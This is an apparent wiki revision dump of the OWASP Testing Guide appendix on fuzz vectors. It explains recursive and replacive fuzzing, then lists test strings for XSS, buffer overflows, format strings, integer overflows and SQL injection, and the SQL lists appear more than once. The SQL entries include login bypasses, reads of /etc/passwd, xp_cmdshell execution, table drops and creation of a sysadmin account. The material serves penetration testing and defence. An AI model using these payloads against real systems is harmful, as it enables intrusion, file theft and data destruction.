&lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13690 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T10:05:09Z <p>Wisec: /* Passive SQL Injection (SQP) */ fixed nowiki tag</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/00000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/11000fff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/ffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec